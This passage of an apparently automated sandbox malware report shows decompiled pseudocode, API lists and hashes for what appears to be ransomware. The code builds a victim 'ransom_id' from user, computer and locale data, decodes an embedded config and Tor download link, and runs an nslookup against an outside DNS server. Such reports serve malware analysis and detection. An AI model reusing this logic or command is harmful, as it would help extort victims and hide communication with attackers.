				void* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				void* _t54;
				void* _t58;
				void* _t60;
				signed int _t61;
				void* _t62;
				WCHAR* _t65;
				signed short _t69;
				signed short* _t70;
				WCHAR* _t77;
				signed int _t82;
				signed int _t83;
				void* _t87;
				void* _t90;
				long _t93;
				WCHAR* _t94;
				signed int _t97;
				void* _t98;
				WCHAR* _t100;
				void* _t102;

				if( *0xf9e2a64 != 0) {
					L24:
					return _t54;
				}
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				E0F9D39F0( &_v148);
				E0F9D7330( &_v236, __edx);
				_t97 = E0F9D7140( &_v236);
				_t93 = 0x42 + _t97 * 2;
				_t58 = VirtualAlloc(0, _t93, 0x3000, 0x40);
				_v244 = _t58;
				if(_t58 == 0 || 0x40 + _t97 * 2 >= _t93) {
					_t98 = 0;
				} else {
					_t98 = _t58;
				}
				E0F9D6F40( &_v152, _t98);
				_t60 = E0F9D8090(_t98, L"ransom_id=");
				_t61 = lstrlenW(L"ransom_id=");
				asm("movdqa xmm1, [0xf9e04a0]");
				_t77 = 0xf9e2000;
				_t87 = 0xa3;
				_t100 = _t60 + _t61 * 2;
				_t62 = 0xa30;
				_v160 = _t100;
				do {
					_t13 =  &(_t77[8]); // 0x44004e
					_t77 = _t13;
					asm("movdqu xmm0, [ecx-0x10]");
					asm("pxor xmm0, xmm1");
					asm("movdqu [ecx-0x10], xmm0");
					_t87 = _t87 - 1;
				} while (_t87 != 0);
				do {
					 *(_t62 + 0xf9e2000) =  *(_t62 + 0xf9e2000) ^ 0x00000005;
					_t62 = _t62 + 1;
				} while (_t62 < 0xa38);
				 *0xf9e2a64 = 0xf9e2000;
				_t94 = E0F9D8090(0xf9e2000, L"{USERID}");
				if(_t94 == 0) {
					L20:
					_v280 = 0x740068;
					_v276 = 0x700074;
					_v272 = 0x3a0073;
					_v268 = 0x2f002f;
					_v264 = 0x770077;
					_v260 = 0x2e0077;
					_v256 = 0x6f0074;
					_v252 = 0x700072;
					_v248 = 0x6f0072;
					_v244 = 0x65006a;
					_v240 = 0x740063;
					_v236 = 0x6f002e;
					_v232 = 0x670072;
					_v228 = 0x64002f;
					_v224 = 0x77006f;
					_v220 = 0x6c006e;
					_v216 = 0x61006f;
					_v212 = 0x2f0064;
					_v208 = 0x6f0064;
					_v204 = 0x6e0077;
					_v200 = 0x6f006c;
					_v196 = 0x640061;
					_v192 = 0x65002d;
					_v188 = 0x730061;
					_v184 = 0x2e0079;
					_v180 = 0x740068;
					_v176 = 0x6c006d;
					_v172 = 0x65002e;
					_v168 = 0x6e;
					if( *0xf9e2a44 == 0) {
						_t65 = VirtualAlloc(0, 0x400, 0x3000, 4);
						 *0xf9e2a44 = _t65;
						if(_t65 != 0) {
							wsprintfW(_t65, L"%s",  &_v280);
						}
					}
					VirtualFree(_v160, 0, 0x8000);
					_t54 = E0F9D7C10( &_v152);
					goto L24;
				}
				while(1) {
					L11:
					lstrcpyW(_t94, _t100);
					_t94[lstrlenW(_t94)] = 0x20;
					_t94 = 0xf9e2000;
					_t69 =  *0xf9e2000; // 0xfeff
					if(_t69 == 0) {
						goto L20;
					}
					_t82 = _t69 & 0x0000ffff;
					_t102 = 0xf9e2000 - L"{USERID}";
					do {
						_t70 = L"{USERID}";
						if(_t82 == 0) {
							goto L19;
						}
						while(1) {
							_t83 =  *_t70 & 0x0000ffff;
							if(_t83 == 0) {
								break;
							}
							_t90 = ( *(_t102 + _t70) & 0x0000ffff) - _t83;
							if(_t90 != 0) {
								L18:
								if( *_t70 == 0) {
									break;
								}
								goto L19;
							}
							_t70 =  &(_t70[1]);
							if( *(_t102 + _t70) != _t90) {
								continue;
							}
							goto L18;
						}
						_t100 = _v156;
						goto L11;
						L19:
						_t20 =  &(_t94[1]); // 0x2d002d
						_t82 =  *_t20 & 0x0000ffff;
						_t94 =  &(_t94[1]);
						_t102 = _t102 + 2;
					} while (_t82 != 0);
					goto L20;
				}
				goto L20;
			}























































                                        0x0f9d40f5
                                        0x0f9d43c8
                                        0x0f9d43cd
                                        0x0f9d43cd
                                        0x0f9d40fb
                                        0x0f9d40fc
                                        0x0f9d40fe
                                        0x0f9d40ff
                                        0x0f9d4104
                                        0x0f9d4106
                                        0x0f9d4107
                                        0x0f9d4109
                                        0x0f9d410a
                                        0x0f9d410c
                                        0x0f9d410d
                                        0x0f9d410f
                                        0x0f9d4110
                                        0x0f9d4115
                                        0x0f9d4117
                                        0x0f9d4118
                                        0x0f9d4121
                                        0x0f9d412d
                                        0x0f9d413e
                                        0x0f9d4147
                                        0x0f9d4151
                                        0x0f9d4157
                                        0x0f9d4160
                                        0x0f9d4171
                                        0x0f9d416d
                                        0x0f9d416d
                                        0x0f9d416d
                                        0x0f9d417b
                                        0x0f9d4187
                                        0x0f9d4193
                                        0x0f9d4199
                                        0x0f9d41a1
                                        0x0f9d41a6
                                        0x0f9d41ab
                                        0x0f9d41ae
                                        0x0f9d41b3
                                        0x0f9d41c0
                                        0x0f9d41c0
                                        0x0f9d41c0
                                        0x0f9d41c3
                                        0x0f9d41c8
                                        0x0f9d41cc
                                        0x0f9d41d1
                                        0x0f9d41d1
                                        0x0f9d41e0
                                        0x0f9d41e0
                                        0x0f9d41e7
                                        0x0f9d41e8
                                        0x0f9d41f4
                                        0x0f9d4208
                                        0x0f9d420c
                                        0x0f9d4286
                                        0x0f9d428d
                                        0x0f9d4295
                                        0x0f9d429d
                                        0x0f9d42a5
                                        0x0f9d42ad
                                        0x0f9d42b5
                                        0x0f9d42bd
                                        0x0f9d42c5
                                        0x0f9d42cd
                                        0x0f9d42d5
                                        0x0f9d42dd
                                        0x0f9d42e5
                                        0x0f9d42ed
                                        0x0f9d42f5
                                        0x0f9d42fd
                                        0x0f9d4305
                                        0x0f9d430d
                                        0x0f9d4315
                                        0x0f9d431d
                                        0x0f9d4325
                                        0x0f9d432d
                                        0x0f9d4335
                                        0x0f9d433d
                                        0x0f9d4345
                                        0x0f9d434d
                                        0x0f9d4355
                                        0x0f9d435d
                                        0x0f9d4365
                                        0x0f9d436d
                                        0x0f9d4375
                                        0x0f9d4385
                                        0x0f9d438b
                                        0x0f9d4392
                                        0x0f9d439f
                                        0x0f9d43a5
                                        0x0f9d4392
                                        0x0f9d43b6
                                        0x0f9d43c3
                                        0x00000000
                                        0x0f9d43c3
                                        0x0f9d4210
                                        0x0f9d4210
                                        0x0f9d4212
                                        0x0f9d4224
                                        0x0f9d4228
                                        0x0f9d422d
                                        0x0f9d4236
                                        0x00000000
                                        0x00000000
                                        0x0f9d423a
                                        0x0f9d423d
                                        0x0f9d4243
                                        0x0f9d4243
                                        0x0f9d424b
                                        0x00000000
                                        0x00000000
                                        0x0f9d4250
                                        0x0f9d4250
                                        0x0f9d4256
                                        0x00000000
                                        0x00000000
                                        0x0f9d4260
                                        0x0f9d4262
                                        0x0f9d426d
                                        0x0f9d4271
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d4271
                                        0x0f9d4264
                                        0x0f9d426b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d426b
                                        0x0f9d43ce
                                        0x00000000
                                        0x0f9d4277
                                        0x0f9d4277
                                        0x0f9d4277
                                        0x0f9d427b
                                        0x0f9d427e
                                        0x0f9d4281
                                        0x00000000
                                        0x0f9d4243
                                        0x00000000

                                        APIs
                                          • Part of subcall function 0F9D39F0: GetProcessHeap.KERNEL32(?,?,0F9D4637,00000000,?,00000000,00000000), ref: 0F9D3A8C
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F9D7357
                                          • Part of subcall function 0F9D7330: GetUserNameW.ADVAPI32(00000000,?), ref: 0F9D7368
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F9D7386
                                          • Part of subcall function 0F9D7330: GetComputerNameW.KERNEL32 ref: 0F9D7390
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F9D73B0
                                          • Part of subcall function 0F9D7330: wsprintfW.USER32 ref: 0F9D73F1
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F9D740E
                                          • Part of subcall function 0F9D7330: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F9D7432
                                          • Part of subcall function 0F9D7330: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,0F9D4640,?), ref: 0F9D7456
                                          • Part of subcall function 0F9D7330: RegCloseKey.ADVAPI32(00000000), ref: 0F9D7472
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7192
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D719D
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71B3
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71BE
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71D4
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71DF
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71F5
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(0F9D4966,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7200
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7216
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7221
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7237
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7242
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7261
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D726C
                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4151
                                        • lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4193
                                        • lstrcpyW.KERNEL32 ref: 0F9D4212
                                        • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4219
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
                                        • String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$ransom_id=$s$t$t$w$w$w$y${USERID}
                                        • API String ID: 4100118565-2385900546
                                        • Opcode ID: a9b34f49fc5e76f8c935f89cf5bfde59dc66cf3a9a0b75e0a45e5569a583decc
                                        • Instruction ID: c7647e25ff9f3e2b9cd667db2ca99cf6af73a741ddd84f731f6c9557aa171e64
                                        • Opcode Fuzzy Hash: a9b34f49fc5e76f8c935f89cf5bfde59dc66cf3a9a0b75e0a45e5569a583decc
                                        • Instruction Fuzzy Hash: FB71E270508340DBE730DF14C909B6ABBEAFB80759F60891CF6855B2D2DBF99548CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D4E90 Relevance: 64.9, APIs: 8, Strings: 29, Instructions: 120pipememoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 100%
                                        			E0F9D4E90(CHAR* __ecx, void* __edx, WCHAR* _a4) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				short _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char _v124;
				struct _SECURITY_ATTRIBUTES _v136;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				void* _t57;
				CHAR* _t64;
				void* _t66;

				_v64 = 0x73006e;
				_t57 = __edx;
				_v8 = 0;
				_t64 = __ecx;
				_v68 = 0;
				_v60 = 0x6f006c;
				_t43 =  !=  ?  &_v124 :  &_v64;
				_v56 = 0x6b006f;
				_a4 =  !=  ?  &_v124 :  &_v64;
				_v52 = 0x700075;
				_v48 = 0x250020;
				_v44 = 0x200053;
				_v40 = 0x6e0064;
				_v36 = 0x310073;
				_v32 = 0x73002e;
				_v28 = 0x70006f;
				_v24 = 0x6f0072;
				_v20 = 0x6e0064;
				_v16 = 0x2e0073;
				_v12 = 0x750072;
				_v124 = 0x73006e;
				_v120 = 0x6f006c;
				_v116 = 0x6b006f;
				_v112 = 0x700075;
				_v108 = 0x250020;
				_v104 = 0x200053;
				_v100 = 0x6e0064;
				_v96 = 0x320073;
				_v92 = 0x73002e;
				_v88 = 0x70006f;
				_v84 = 0x6f0072;
				_v80 = 0x6e0064;
				_v76 = 0x2e0073;
				_v72 = 0x750072;
				_v136.nLength = 0xc;
				_v136.bInheritHandle = 1;
				_v136.lpSecurityDescriptor = 0;
				_t45 = CreatePipe(0xf9e2a70, 0xf9e2a6c,  &_v136, 0);
				if(_t45 != 0) {
					_t45 = SetHandleInformation( *0xf9e2a70, 1, 0);
					if(_t45 == 0) {
						goto L1;
					} else {
						CreatePipe(0xf9e2a68, 0xf9e2a74,  &_v136, 0);
						_t45 = SetHandleInformation( *0xf9e2a74, 1, 0);
						if(_t45 == 0) {
							goto L1;
						} else {
							_t66 = VirtualAlloc(0, 0x2800, 0x3000, 4);
							if(_t66 == 0) {
								lstrcpyA(_t64, "fabian wosar <3");
								return 0;
							} else {
								wsprintfW(_t66, _a4, _t57);
								E0F9D4C40(_t66);
								E0F9D4DE0(_t57, _t64, _t57, _t64, _t66);
								VirtualFree(_t66, 0, 0x8000);
								return 0;
							}
						}
					}
				} else {
					L1:
					return _t45 | 0xffffffff;
				}
			}









































                                        0x0f9d4e9d
                                        0x0f9d4ea8
                                        0x0f9d4eab
                                        0x0f9d4eaf
                                        0x0f9d4eb1
                                        0x0f9d4ebb
                                        0x0f9d4ec2
                                        0x0f9d4ec5
                                        0x0f9d4ece
                                        0x0f9d4ee2
                                        0x0f9d4ee9
                                        0x0f9d4ef0
                                        0x0f9d4ef7
                                        0x0f9d4efe
                                        0x0f9d4f05
                                        0x0f9d4f0c
                                        0x0f9d4f13
                                        0x0f9d4f1a
                                        0x0f9d4f21
                                        0x0f9d4f28
                                        0x0f9d4f2f
                                        0x0f9d4f36
                                        0x0f9d4f3d
                                        0x0f9d4f44
                                        0x0f9d4f4b
                                        0x0f9d4f52
                                        0x0f9d4f59
                                        0x0f9d4f60
                                        0x0f9d4f67
                                        0x0f9d4f6e
                                        0x0f9d4f75
                                        0x0f9d4f7c
                                        0x0f9d4f83
                                        0x0f9d4f8a
                                        0x0f9d4f91
                                        0x0f9d4f9b
                                        0x0f9d4fa2
                                        0x0f9d4fa9
                                        0x0f9d4fb1
                                        0x0f9d4fcd
                                        0x0f9d4fd1
                                        0x00000000
                                        0x0f9d4fd3
                                        0x0f9d4fe6
                                        0x0f9d4ff6
                                        0x0f9d4ffa
                                        0x00000000
                                        0x0f9d4ffc
                                        0x0f9d5010
                                        0x0f9d5014
                                        0x0f9d5051
                                        0x0f9d505f
                                        0x0f9d5016
                                        0x0f9d501b
                                        0x0f9d5026
                                        0x0f9d502f
                                        0x0f9d503c
                                        0x0f9d504a
                                        0x0f9d504a
                                        0x0f9d5014
                                        0x0f9d4ffa
                                        0x0f9d4fb3
                                        0x0f9d4fb3
                                        0x0f9d4fbc
                                        0x0f9d4fbc

                                        APIs
                                        • CreatePipe.KERNEL32(0F9E2A70,0F9E2A6C,?,00000000,00000001,00000001,00000000), ref: 0F9D4FA9
                                        • SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F9D4FCD
                                        • CreatePipe.KERNEL32(0F9E2A68,0F9E2A74,0000000C,00000000), ref: 0F9D4FE6
                                        • SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F9D4FF6
                                        • VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 0F9D500A
                                        • wsprintfW.USER32 ref: 0F9D501B
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D503C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
                                        • String ID: $ $.$.$S$S$d$d$d$d$fabian wosar <3$l$l$n$n$o$o$o$o$r$r$r$r$s$s$s$s$u$u
                                        • API String ID: 1490407255-3453122116
                                        • Opcode ID: c20d2cf8a3f784cb4cc69dbec90659bb61b0dc030529fe661d70f77e9740d0fc
                                        • Instruction ID: 163e21a783c1a5fa8a35e4008c080839245fdbe60ce28d39c22a4fc74c2d00d9
                                        • Opcode Fuzzy Hash: c20d2cf8a3f784cb4cc69dbec90659bb61b0dc030529fe661d70f77e9740d0fc
                                        • Instruction Fuzzy Hash: 22418270E053189BEB20CF95E8487EDBFB5FB04755F208129E504AB292C7F905988F94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D41D6 Relevance: 61.4, APIs: 5, Strings: 30, Instructions: 104stringmemoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0F9D41D6(void* __eax, void* __ebp, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, void* _a128, WCHAR* _a132, char _a136) {
				void* _t41;
				void* _t44;
				WCHAR* _t45;
				signed short _t49;
				signed short* _t50;
				signed int _t55;
				signed int _t56;
				void* _t59;
				WCHAR* _t60;
				WCHAR* _t62;
				void* _t65;

				_t41 = __eax;
				do {
					 *(_t41 + 0xf9e2000) =  *(_t41 + 0xf9e2000) ^ 0x00000005;
					_t41 = _t41 + 1;
				} while (_t41 < 0xa38);
				 *0xf9e2a64 = 0xf9e2000;
				_t60 = E0F9D8090(0xf9e2000, L"{USERID}");
				if(_t60 != 0) {
					while(1) {
						L4:
						lstrcpyW(_t60, _t62);
						_t60[lstrlenW(_t60)] = 0x20;
						_t60 = 0xf9e2000;
						_t49 =  *0xf9e2000; // 0xfeff
						if(_t49 == 0) {
							goto L13;
						}
						_t55 = _t49 & 0x0000ffff;
						_t65 = 0xf9e2000 - L"{USERID}";
						do {
							_t50 = L"{USERID}";
							if(_t55 == 0) {
								goto L12;
							} else {
								while(1) {
									_t56 =  *_t50 & 0x0000ffff;
									if(_t56 == 0) {
										break;
									}
									_t59 = ( *(_t65 + _t50) & 0x0000ffff) - _t56;
									if(_t59 != 0) {
										L11:
										if( *_t50 == 0) {
											break;
										} else {
											goto L12;
										}
									} else {
										_t50 =  &(_t50[1]);
										if( *(_t65 + _t50) != _t59) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L13;
								}
								_t62 = _a132;
								goto L4;
							}
							goto L13;
							L12:
							_t7 =  &(_t60[1]); // 0x2d002d
							_t55 =  *_t7 & 0x0000ffff;
							_t60 =  &(_t60[1]);
							_t65 = _t65 + 2;
						} while (_t55 != 0);
						goto L13;
					}
				}
				L13:
				_a8 = 0x740068;
				_a12 = 0x700074;
				_a16 = 0x3a0073;
				_a20 = 0x2f002f;
				_a24 = 0x770077;
				_a28 = 0x2e0077;
				_a32 = 0x6f0074;
				_a36 = 0x700072;
				_a40 = 0x6f0072;
				_a44 = 0x65006a;
				_a48 = 0x740063;
				_a52 = 0x6f002e;
				_a56 = 0x670072;
				_a60 = 0x64002f;
				_a64 = 0x77006f;
				_a68 = 0x6c006e;
				_a72 = 0x61006f;
				_a76 = 0x2f0064;
				_a80 = 0x6f0064;
				_a84 = 0x6e0077;
				_a88 = 0x6f006c;
				_a92 = 0x640061;
				_a96 = 0x65002d;
				_a100 = 0x730061;
				_a104 = 0x2e0079;
				_a108 = 0x740068;
				_a112 = 0x6c006d;
				_a116 = 0x65002e;
				_a120 = 0x6e;
				if( *0xf9e2a44 == 0) {
					_t45 = VirtualAlloc(0, 0x400, 0x3000, 4);
					 *0xf9e2a44 = _t45;
					if(_t45 != 0) {
						wsprintfW(_t45, L"%s",  &_a8);
					}
				}
				VirtualFree(_a128, 0, 0x8000);
				_t44 = E0F9D7C10( &_a136);
				return _t44;
			}














                                        0x0f9d41d6
                                        0x0f9d41e0
                                        0x0f9d41e0
                                        0x0f9d41e7
                                        0x0f9d41e8
                                        0x0f9d41f4
                                        0x0f9d4208
                                        0x0f9d420c
                                        0x0f9d4210
                                        0x0f9d4210
                                        0x0f9d4212
                                        0x0f9d4224
                                        0x0f9d4228
                                        0x0f9d422d
                                        0x0f9d4236
                                        0x00000000
                                        0x00000000
                                        0x0f9d423a
                                        0x0f9d423d
                                        0x0f9d4243
                                        0x0f9d4243
                                        0x0f9d424b
                                        0x00000000
                                        0x0f9d4250
                                        0x0f9d4250
                                        0x0f9d4250
                                        0x0f9d4256
                                        0x00000000
                                        0x00000000
                                        0x0f9d4260
                                        0x0f9d4262
                                        0x0f9d426d
                                        0x0f9d4271
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d4264
                                        0x0f9d4264
                                        0x0f9d426b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d426b
                                        0x00000000
                                        0x0f9d4262
                                        0x0f9d43ce
                                        0x00000000
                                        0x0f9d43ce
                                        0x00000000
                                        0x0f9d4277
                                        0x0f9d4277
                                        0x0f9d4277
                                        0x0f9d427b
                                        0x0f9d427e
                                        0x0f9d4281
                                        0x00000000
                                        0x0f9d4243
                                        0x0f9d4210
                                        0x0f9d4286
                                        0x0f9d428d
                                        0x0f9d4295
                                        0x0f9d429d
                                        0x0f9d42a5
                                        0x0f9d42ad
                                        0x0f9d42b5
                                        0x0f9d42bd
                                        0x0f9d42c5
                                        0x0f9d42cd
                                        0x0f9d42d5
                                        0x0f9d42dd
                                        0x0f9d42e5
                                        0x0f9d42ed
                                        0x0f9d42f5
                                        0x0f9d42fd
                                        0x0f9d4305
                                        0x0f9d430d
                                        0x0f9d4315
                                        0x0f9d431d
                                        0x0f9d4325
                                        0x0f9d432d
                                        0x0f9d4335
                                        0x0f9d433d
                                        0x0f9d4345
                                        0x0f9d434d
                                        0x0f9d4355
                                        0x0f9d435d
                                        0x0f9d4365
                                        0x0f9d436d
                                        0x0f9d4375
                                        0x0f9d4385
                                        0x0f9d438b
                                        0x0f9d4392
                                        0x0f9d439f
                                        0x0f9d43a5
                                        0x0f9d4392
                                        0x0f9d43b6
                                        0x0f9d43c3
                                        0x0f9d43cd

                                        APIs
                                        • lstrcpyW.KERNEL32 ref: 0F9D4212
                                        • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4219
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F9D4385
                                        • wsprintfW.USER32 ref: 0F9D439F
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D43B6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
                                        • String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$s$t$t$w$w$w$y${USERID}
                                        • API String ID: 4033391921-3341315666
                                        • Opcode ID: 5e2bc8b57a2e8dd9c989ce577d157cd50c197d538cb3fb0108f7213c47f6e1b2
                                        • Instruction ID: bdef4670d4e6e9611c6fe0d843e6577e2dde8ef92e158d646d22250ee7fdf2a4
                                        • Opcode Fuzzy Hash: 5e2bc8b57a2e8dd9c989ce577d157cd50c197d538cb3fb0108f7213c47f6e1b2
                                        • Instruction Fuzzy Hash: 57419C70508341CBE720DF14C54876ABFE6FB81799F64891CF6880B292D7FA8599CF52
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D2960 Relevance: 61.3, APIs: 5, Strings: 30, Instructions: 87registrystringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 93%
                                        			E0F9D2960(WCHAR* __ecx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				short _v140;
				WCHAR* _t58;

				_t58 = __ecx;
				_v32 = 0x520050;
				_v28 = 0x440049;
				_push(0x41);
				_v24 = 0x520055;
				_v20 = 0x530041;
				_v16 = 0x4b0048;
				_v12 = 0x41;
				E0F9D8150( &_v32, lstrlenW( &_v32));
				_v140 = 0x4f0053;
				_v136 = 0x540046;
				_v132 = 0x410057;
				_v128 = 0x450052;
				_v124 = 0x4d005c;
				_v120 = 0x630069;
				_v116 = 0x6f0072;
				_v112 = 0x6f0073;
				_v108 = 0x740066;
				_v104 = 0x57005c;
				_v100 = 0x6e0069;
				_v96 = 0x6f0064;
